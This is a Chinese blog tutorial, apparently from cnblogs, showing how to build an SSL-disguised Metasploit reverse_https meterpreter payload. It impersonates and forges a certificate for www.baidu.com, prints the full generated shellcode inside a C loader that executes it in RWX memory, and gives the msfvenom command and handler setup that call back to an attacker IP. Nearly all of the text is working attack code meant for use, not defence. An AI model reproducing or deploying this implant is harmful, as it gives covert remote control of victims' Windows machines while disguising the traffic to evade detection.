Metasploit 生成带SSL加密载荷

1.下载证书。Impersonate_SSL模块,下载指定网站的证书。

msf6> use auxiliary/gather/impersonate_ssl
msf6 auxiliary(gather/impersonate_ssl) > set rhost  www.baidu.com
msf6 auxiliary(gather/impersonate_ssl) > run

得到:/root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem

2.生成带有ssl证书的shellcode代码。

msf auxiliary(impersonate_ssl) > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set STAGERVERIFYSSLCERT true
msf payload(reverse_https) > set HANDLERSSLCERT /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
msf payload(reverse_https) > set LHOST 192.168.140.128
msf payload(reverse_https) > set LPORT 8443
msf6 payload > generate -f c -o /root/shell.c

3.打开生成文件,然后加入到shellcode执行盒中。

#include <Windows.h>
#include <stdio.h>
#pragma comment(linker, "/section:.data,RWE")

unsigned char buf[] = 
"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x8b\x58\x20\x50\x01\xd3"
"\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xac"
"\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26"
"\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\xe8\x3e\x00\x00\x00"
"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69"
"\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54"
"\x72\x69\x64\x65\x6e\x74\x2f\x37\x2e\x30\x3b\x20\x72\x76\x3a"
"\x31\x31\x2e\x30\x29\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b"
"\x6f\x00\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53"
"\x68\xfb\x20\x00\x00\xe8\x6a\x01\x00\x00\x2f\x72\x6a\x5f\x79"
"\x6d\x73\x34\x4b\x4f\x74\x6d\x72\x59\x61\x70\x67\x79\x37\x73"
"\x50\x52\x41\x4f\x65\x44\x6d\x76\x68\x35\x64\x4d\x46\x5f\x32"
"\x34\x6b\x44\x5a\x6d\x79\x43\x65\x69\x32\x33\x55\x75\x66\x58"
"\x68\x55\x41\x33\x54\x62\x43\x32\x6a\x70\x5a\x43\x49\x5f\x64"
"\x47\x65\x32\x70\x54\x69\x5a\x63\x79\x76\x68\x53\x6a\x5f\x37"
"\x51\x58\x5f\x73\x68\x33\x62\x67\x44\x36\x6a\x66\x69\x32\x46"
"\x55\x63\x4a\x65\x6a\x70\x4d\x74\x56\x53\x51\x67\x6f\x30\x67"
"\x48\x4a\x46\x4a\x6c\x36\x54\x52\x33\x78\x55\x6c\x6f\x44\x70"
"\x62\x36\x5a\x31\x68\x34\x32\x4a\x37\x6d\x35\x50\x5f\x54\x79"
"\x67\x44\x4d\x41\x4f\x71\x6e\x65\x52\x48\x39\x35\x53\x5a\x4c"
"\x54\x66\x57\x58\x74\x45\x4a\x38\x75\x6d\x2d\x4e\x55\x62\x6f"
"\x78\x66\x59\x58\x55\x34\x46\x76\x62\x48\x59\x35\x30\x6c\x6b"
"\x4f\x67\x48\x42\x43\x39\x4a\x4b\x41\x75\x38\x41\x6c\x37\x69"
"\x39\x51\x76\x4e\x30\x65\x6d\x37\x54\x70\x43\x5a\x65\x6b\x4b"
"\x72\x4b\x4f\x00\x50\x68\x57\x89\x9f\xc6\xff\xd5\x89\xc6\x53"
"\x68\x00\x32\xe8\x84\x53\x53\x53\x57\x53\x56\x68\xeb\x55\x2e"
"\x3b\xff\xd5\x96\x6a\x0a\x5f\x68\x80\x33\x00\x00\x89\xe0\x6a"
"\x04\x50\x6a\x1f\x56\x68\x75\x46\x9e\x86\xff\xd5\x53\x53\x53"
"\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x14\x68\x88"
"\x13\x00\x00\x68\x44\xf0\x35\xe0\xff\xd5\x4f\x75\xcd\xe8\x4c"
"\x00\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00"
"\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68"
"\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0"
"\x74\xcf\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\x5f\xe8\x6b"
"\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x34\x30\x2e"
"\x31\x32\x38\x00\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";
typedef void(__stdcall* CODE) ();

int main()
{
    //((void(*)(void))&buf)();
    PVOID pFunction = NULL;
    pFunction = VirtualAlloc(0, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(pFunction, buf, sizeof(buf));
    CODE StartShell = (CODE)pFunction;
    StartShell();
}

4.建立侦听

use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
msf exploit(handler) > set HANDLERSSLCERT  /root/.msf4/loot/20210629003816_default_110.242.68.4_110.242.68.4_pem_993753.pem
msf exploit(handler) > set STAGERVERIFYSSLCERT true
msf exploit(handler) > set LPORT 8443
msf exploit(handler) > set LHOST 192.168.140.128
msf exploit(handler) > run -j

确保网站可以打开。

运行后即可上线。

如果需要自己制作证书,则可以使用,脚本生成。

#!/bin/bash
clear
read -p "Password:" PASS
echo "创建AES256加密密钥..."
openssl genrsa -passout pass:${PASS} -out rsa_aes_private.pem 2048
echo "生成公钥..."
openssl rsa -in rsa_aes_private.pem -passin pass:${PASS} -pubout -out rsa_public.pem
echo "PEM私钥转DER..."
openssl rsa -in rsa_aes_private.pem -passin pass:${PASS} -out rsa_private_key.der -outform der 
echo "PEM公钥转DER..."
openssl rsa -in rsa_public.pem -out rsa_public_key.der -pubin -outform der 
echo "Finish!"

1.通过openssl伪造证书

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt
cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem
rm -rf www.baidu.com.key www.baidu.com.crt

2.非交互生成shellcode

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.140.128 LPORT=8443 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell HandlerSSLCert=/root/test/www.baidu.com.pem StagerVerifySSLCert=true -f c -o /root/test.c

3.启动侦听

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.140.128
set LPORT 8443
set HandlerSSLCert /root/test/www.baidu.com.pem
set StagerVerifySSLCert true
exploit -j -z
posted @ 2021-06-29 12:45  lyshark  阅读(1041)  评论(0编辑  收藏  举报

loading... | loading...
博客园 - 开发者的网上家园